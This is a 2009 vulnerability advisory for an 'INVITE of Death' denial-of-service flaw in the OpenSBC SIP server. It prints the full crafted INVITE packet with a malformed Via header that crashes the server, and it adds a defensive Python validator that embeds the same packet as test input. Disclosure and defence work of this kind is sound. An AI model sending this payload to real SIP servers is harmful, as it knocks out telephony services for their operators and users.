OpenSBC (INVITE of Death)
Advisory Draft Date: 2nd February, 2009. Release Date: 16th February, 2009.
Affected Application | OpenSBC Server
---|---
Severity | High
Status | Disclosed
Reported To | Joegen Baclor (CTO Solegy Systems)
Author | M. Zubair Rafique and Dr. Muddassar Farooq
Background
OpenSBC is an ongoing effort to create an open-source Session Border Controller that is fully compliant with the mandates of RFC 3261. OpenSBC can be used as a SIP router, as a media anchor for far-end NAT traversal, and for SIP egress and ingress trunking, among other roles. More information about the server can be found at http://opensipstack.org/Overview
The INVITE of Death vulnerability in the OpenSBC server allows an attacker to crash the server, causing a remote Denial of Service (DoS). The problem specifically exists in OpenSBC version 1.1.5-25, in the handling of the "Via" header field of a maliciously crafted SIP packet.
Proof of Concept
The proof of concept code can be downloaded from here: OpenSBC.pl. The malicious packet on which the server crashes is shown below:
INVITE sip:bob@open-ims.test SIP/2.0
Via:::::: SIP/2.0/UDP localhost.localdomain:5060;branch=z9hG4bK000000
From: 0 ;tag=0
To: Receiver
Call-ID: 0@localhost.localdomain
CSeq: 1 INVITE
Contact: 0
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 131

v=0
o=0 0 0 IN IP4 localhost.localdomain
s=Session SDP
c=IN IP4 127.0.0.1
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000
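The crash is triggered by a Via header whose sent-protocol field is a run of colons instead of "SIP/2.0/transport". The check below is an added defender-side example, not the advisory's proof-of-concept code and not part of OpenSBC: it parses a SIP request, validates every Via value against a simplified form of the RFC 3261 via-parm grammar (sent-protocol, sent-by, optional parameters, mandatory branch), and confirms that Content-Length agrees with the body actually received. The function and constant names are my own; the embedded request is the packet from this advisory, reconstructed with the CRLF line endings SIP requires (the SDP body is exactly 131 bytes, so the published Content-Length is consistent).

```python
import re

# Simplified RFC 3261 grammar for a single via-parm:
#   via-parm      = sent-protocol LWS sent-by *( SEMI via-params )
#   sent-protocol = "SIP" "/" "2.0" "/" transport   (transport is a token: UDP, TCP, TLS, SCTP, ...)
#   sent-by       = host [ ":" port ]
# Quoted-string parameter values are not handled; this is a gate, not a full parser.
_VIA_PARM = re.compile(
    r"^SIP/2\.0/(?P<transport>[A-Za-z0-9]+)"          # sent-protocol
    r"\s+"                                             # LWS
    r"(?P<host>\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.\-]+)"    # host: bracketed IPv6, or hostname / IPv4
    r"(?::(?P<port>\d{1,5}))?"                         # optional port
    r"(?P<params>(?:\s*;\s*[A-Za-z0-9\-_.!%*+`'~]+(?:=[^;,\s]+)?)*)"  # ;name[=value] parameters
    r"\s*$"
)

_HEADER_NAME = re.compile(r"^[A-Za-z0-9\-.!%*_+`'~]+$")   # RFC 3261 "token"


def split_message(raw: str):
    """Split a SIP message into (request_line, [(name, value), ...], body).

    Header names are lower-cased. A header line whose name is not a valid
    token is returned with name None so the caller can flag it.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon and _HEADER_NAME.match(name.strip()):
            headers.append((name.strip().lower(), value.strip()))
        else:
            headers.append((None, line))
    return lines[0], headers, body


def validate_sip_request(raw: str) -> list[str]:
    """Return the problems found; an empty list means the request passed the checks."""
    problems: list[str] = []
    _, headers, body = split_message(raw)

    for name, line in headers:
        if name is None:
            problems.append(f"unparseable header line: {line!r}")

    # Via (compact form "v") may appear several times, and one field may carry
    # several comma-separated via-parms. Each must match the grammar and carry
    # the branch parameter RFC 3261 requires of a compliant sender.
    vias = [v for n, v in headers if n in ("via", "v")]
    if not vias:
        problems.append("missing Via header")
    for field in vias:
        for parm in field.split(","):
            parm = parm.strip()
            m = _VIA_PARM.match(parm)
            if m is None:
                problems.append(f"malformed Via value: {parm!r}")
                continue
            if m.group("port") is not None and not 0 < int(m.group("port")) <= 65535:
                problems.append(f"Via port out of range: {m.group('port')}")
            if ";branch=" not in m.group("params").replace(" ", ""):
                problems.append(f"Via without branch parameter: {parm!r}")

    # Content-Length must be numeric and agree with the body actually received;
    # a mismatch is a common way to confuse a parser about where the body ends.
    declared = next((v for n, v in headers if n in ("content-length", "l")), None)
    if declared is not None:
        actual = len(body.encode("utf-8"))
        if not declared.isdigit():
            problems.append(f"non-numeric Content-Length: {declared!r}")
        elif int(declared) != actual:
            problems.append(f"Content-Length {declared} does not match actual body length {actual}")
    return problems


# Constructed test input: the request from the advisory with CRLF line endings.
MALFORMED_INVITE = (
    "INVITE sip:bob@open-ims.test SIP/2.0\r\n"
    "Via:::::: SIP/2.0/UDP localhost.localdomain:5060;branch=z9hG4bK000000\r\n"
    "From: 0 ;tag=0\r\n"
    "To: Receiver\r\n"
    "Call-ID: 0@localhost.localdomain\r\n"
    "CSeq: 1 INVITE\r\n"
    "Contact: 0\r\n"
    "Expires: 1200\r\n"
    "Max-Forwards: 70\r\n"
    "Content-Type: application/sdp\r\n"
    "Content-Length: 131\r\n"
    "\r\n"
    "v=0\r\n"
    "o=0 0 0 IN IP4 localhost.localdomain\r\n"
    "s=Session SDP\r\n"
    "c=IN IP4 127.0.0.1\r\n"
    "t=0 0\r\n"
    "m=audio 9876 RTP/AVP 0\r\n"
    "a=rtpmap:0 PCMU/8000\r\n"
)

# The same request with a grammatical Via header, constructed for comparison.
WELLFORMED_INVITE = MALFORMED_INVITE.replace("Via:::::: SIP/2.0/UDP", "Via: SIP/2.0/UDP", 1)

if __name__ == "__main__":
    for label, msg in (("malformed", MALFORMED_INVITE), ("well-formed", WELLFORMED_INVITE)):
        print(label, "->", validate_sip_request(msg) or "accepted")
```

Run stand-alone, the script reports the advisory's packet as "malformed Via value" and accepts the corrected one. A border element that rejects such a request with a 400 response before it reaches the routing logic removes this class of parser crash regardless of what the downstream Via handling does.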
Workaround
The OpenSBC development team has been notified of the vulnerability. Below is the e-mail exchange between our research team and the CTO of Solegy Systems:
Credits
The vulnerability was discovered by Zubair Rafique and Sohail Aziz from the IMS security research project team.
Contact
M. Zubair Rafique: Zubair.rafique@nexginrc.org, +92-346-5356929
M. Ali Akbar: ali.akbar@nexginrc.org, +92-321-2936105
Disclaimer
The contents of this advisory are copyright (c) 2009 nexGIN RC, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
LINK: http://ims-bisf.nexginrc.org/OpenSBC-vul.html